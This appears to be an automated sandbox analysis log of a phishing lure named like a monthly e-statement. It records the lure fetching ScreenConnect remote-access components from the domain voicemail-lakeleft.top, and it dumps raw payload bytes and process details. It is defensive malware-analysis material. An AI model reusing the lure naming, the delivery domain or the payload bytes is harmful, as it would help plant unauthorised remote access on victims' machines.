                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC16384INData Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a
                                                                                                                                                                                                                                                  Data Ascii: *0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o*(J{o(%o
                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC16384INData Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b
                                                                                                                                                                                                                                                  Data Ascii: {To.{To*0b{To,M{Z(o{To{T{Toto&{To{(<*(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC16384INData Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00
                                                                                                                                                                                                                                                  Data Ascii: s'(+(+o(*()~*(+ `(,s-(.*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC16384INData Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63
                                                                                                                                                                                                                                                  Data Ascii: ,(*o*0Q(a-((b,(*{,((b,(*o*(a-(,(*{,(,(*o*(a-(,(*{,(,(*(*0(o(c
                                                                                                                                                                                                                                                  2024-11-08 10:01:32 UTC16384INData Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01
                                                                                                                                                                                                                                                  Data Ascii: *2{8o*6{8o*0){:(t|:(O+3*0){:(t|:(O+3*0)Z{:s%{9X}9o(P+*f}9({8o*(*2{8o*2{8(r
                                                                                                                                                                                                                                                  2024-11-08 10:01:33 UTC16384INData Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30
                                                                                                                                                                                                                                                  Data Ascii: {=,{=o"{<,{<o",o"(`&*4iA5$0J( "(,("?}s~(s}ts}q*0){x(t|x(+3*0
                                                                                                                                                                                                                                                  2024-11-08 10:01:33 UTC16384INData Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04
                                                                                                                                                                                                                                                  Data Ascii: (+~s`(!+(%-&(oA(*~**(oA(~oo*.(o^*.(oD*.(oJ*.(oL*.(oH*.(oB*.(oD*.(oF*.(oD*.(ob*.(od*.(of*.(
                                                                                                                                                                                                                                                  2024-11-08 10:01:33 UTC16384INData Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9
                                                                                                                                                                                                                                                  Data Ascii: %(!+*0EAs}s(+~%-&~s%(+*0.B~r@pd(o,o"*"(s(,#(o(**V(-s*s*f(-s
                                                                                                                                                                                                                                                  2024-11-08 10:01:33 UTC16384INData Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06
                                                                                                                                                                                                                                                  Data Ascii: o((((*v(#% o% o*0(,+((((,((s;*(((((-d(((((-?(((((-((((


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.549818194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:36 UTC97OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  2024-11-08 10:01:36 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 548864
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:35 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:36 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                                                                                                  2024-11-08 10:01:36 UTC16384INData Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72
                                                                                                                                                                                                                                                  Data Ascii: &*{l*"}l*:(<(m*0(<oF{n-(++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r
                                                                                                                                                                                                                                                  2024-11-08 10:01:36 UTC16384INData Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80
                                                                                                                                                                                                                                                  Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00
                                                                                                                                                                                                                                                  Data Ascii: o:3*oXo(Y+s9*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds;%(+*(+(+-j+j(L(+*&f__`*v(
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a
                                                                                                                                                                                                                                                  Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28
                                                                                                                                                                                                                                                  Data Ascii: (jX}{~*(+*0)Q{(+tO|(+3*0)Q{(-tO|(+3*V(6}}*{*{*Z(>Z((?X*(=u}u}*(c,{(
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07
                                                                                                                                                                                                                                                  Data Ascii: o-,o*290Dyo+&ooo(o(o-,o*29(<}=}>}?}@}A*{=*{>*{?*{@*{A*0G*~-:~(,~
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00
                                                                                                                                                                                                                                                  Data Ascii: :j******0iY(`(2*sjz(<*.s2*(<*2{3oB*(<*6{o{*(<*6{o{*.s8*(<*"(]*"(c*(<*0{;(+d(zo6*0
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a
                                                                                                                                                                                                                                                  Data Ascii: (V*(<*6{/o0*6{/o0*(<*J{"{#(1*(<*J{'{((1*.s%*(<*o"*oC*.s(*(<*oC*.s**(<*"(R*:NoC*.s-*(<*:oC*(<*
                                                                                                                                                                                                                                                  2024-11-08 10:01:37 UTC16384INData Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03
                                                                                                                                                                                                                                                  Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:05:00:59
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe"
                                                                                                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                                                                                                  File size:83'376 bytes
                                                                                                                                                                                                                                                  MD5 hash:27BD2490FD75556AAB2DF57EA7C1147F
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:05:01:00
                                                                                                                                                                                                                                                  Start date:08/11/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                  Imagebase:0x25d1b9d0000
                                                                                                                                                                                                                                                  File size:24'856 bytes
                                                                                                                                                                                                                                                  MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
